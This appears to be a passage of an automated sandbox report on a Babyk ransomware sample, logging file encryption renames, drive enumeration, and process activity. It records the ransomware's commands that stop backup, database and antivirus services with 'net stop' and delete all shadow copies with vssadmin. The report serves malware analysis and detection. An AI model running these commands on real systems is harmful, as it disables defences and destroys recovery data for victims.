File opened for modification C:\Users\Admin\Pictures\StopEdit.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\BlockConvert.png => C:\Users\Admin\Pictures\BlockConvert.png.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\JoinOut.tif => C:\Users\Admin\Pictures\JoinOut.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\JoinOut.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResolveRegister.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\RestartEdit.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\CompleteDisconnect.tiff => C:\Users\Admin\Pictures\CompleteDisconnect.tiff.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\MergeUnregister.tiff => C:\Users\Admin\Pictures\MergeUnregister.tiff.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 860 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 1964 wrote to memory of 2072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 1964 wrote to memory of 2072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2072 wrote to memory of 3248 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2072 wrote to memory of 3248 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 2840 wrote to memory of 512 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2840 wrote to memory of 512 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 512 wrote to memory of 1880 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 512 wrote to memory of 1880 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 200 wrote to memory of 940 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 200 wrote to memory of 940 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 940 wrote to memory of 2304 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 940 wrote to memory of 2304 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 3992 wrote to memory of 3396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3992 wrote to memory of 3396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3396 wrote to memory of 3648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3396 wrote to memory of 3648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 1316 wrote to memory of 2124 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 1316 wrote to memory of 2124 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2124 wrote to memory of 2144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2124 wrote to memory of 2144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 2236 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2236 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 912 wrote to memory of 3920 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 912 wrote to memory of 3920 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 3368 wrote to memory of 1788 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3368 wrote to memory of 1788 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 1788 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1788 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 3956 wrote to memory of 2072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3956 wrote to memory of 2072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2072 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2072 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 580 wrote to memory of 416 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 580 wrote to memory of 416 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 416 wrote to memory of 2844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 416 wrote to memory of 2844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 188 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 188 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 188 wrote to memory of 2404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 188 wrote to memory of 2404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2404 wrote to memory of 184 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2404 wrote to memory of 184 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 740 wrote to memory of 2804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 740 wrote to memory of 2804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe

"C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop mssqlserver /y

C:\Windows\system32\net.exe

net stop mssqlserver /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mssqlserver /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop vss /y

C:\Windows\system32\net.exe

net stop vss /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop vss /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop sql /y

C:\Windows\system32\net.exe

net stop sql /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sql /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop svc$ /y

C:\Windows\system32\net.exe

net stop svc$ /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop svc$ /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop memtas /y

C:\Windows\system32\net.exe

net stop memtas /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop memtas /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop mepocs /y

C:\Windows\system32\net.exe

net stop mepocs /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mepocs /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop sophos /y

C:\Windows\system32\net.exe

net stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop veeam /y

C:\Windows\system32\net.exe

net stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop backup /y

C:\Windows\system32\net.exe

net stop backup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop backup /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxVss /y

C:\Windows\system32\net.exe

net stop GxVss /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxVss /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxBlr /y

C:\Windows\system32\net.exe

net stop GxBlr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxBlr /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxFWD /y

C:\Windows\system32\net.exe

net stop GxFWD /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxFWD /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxCVD /y

C:\Windows\system32\net.exe

net stop GxCVD /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxCVD /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxCIMgr /y

C:\Windows\system32\net.exe

net stop GxCIMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxCIMgr /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop DefWatch /y

C:\Windows\system32\net.exe

net stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop ccEvtMgr /y

C:\Windows\system32\net.exe

net stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop ccSetMgr /y

C:\Windows\system32\net.exe

net stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop SavRoam /y

C:\Windows\system32\net.exe

net stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop RTVscan /y

C:\Windows\system32\net.exe

net stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop QBFCService /y

C:\Windows\system32\net.exe

net stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop QBIDPService /y

C:\Windows\system32\net.exe

net stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net.exe

net stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop QBCFMonitorService /y

C:\Windows\system32\net.exe

net stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop YooBackup /y

C:\Windows\system32\net.exe

net stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop YooIT /y

C:\Windows\system32\net.exe

net stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop zhudongfangyu /y

C:\Windows\system32\net.exe

net stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop sophos /y

C:\Windows\system32\net.exe

net stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop stc_raw_agent /y

C:\Windows\system32\net.exe

net stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop VSNAPVSS /y

C:\Windows\system32\net.exe

net stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\system32\net.exe

net stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\system32\net.exe

net stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\system32\net.exe

net stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop veeam /y

C:\Windows\system32\net.exe

net stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\system32\net.exe

net stop PDVFSService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\system32\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\system32\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\system32\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecDiveciMediaService /y

C:\Windows\system32\net.exe

net stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\system32\net.exe

net stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\system32\net.exe

net stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\system32\net.exe

net stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\system32\net.exe

net stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\system32\net.exe

net stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop CASAD2DWebSvc /y

C:\Windows\system32\net.exe

net stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop CAARCUpdateSvc /y

C:\Windows\system32\net.exe

net stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GoogleChromeElevationService /y

C:\Windows\system32\net.exe

net stop GoogleChromeElevationService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GoogleChromeElevationService /y

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files
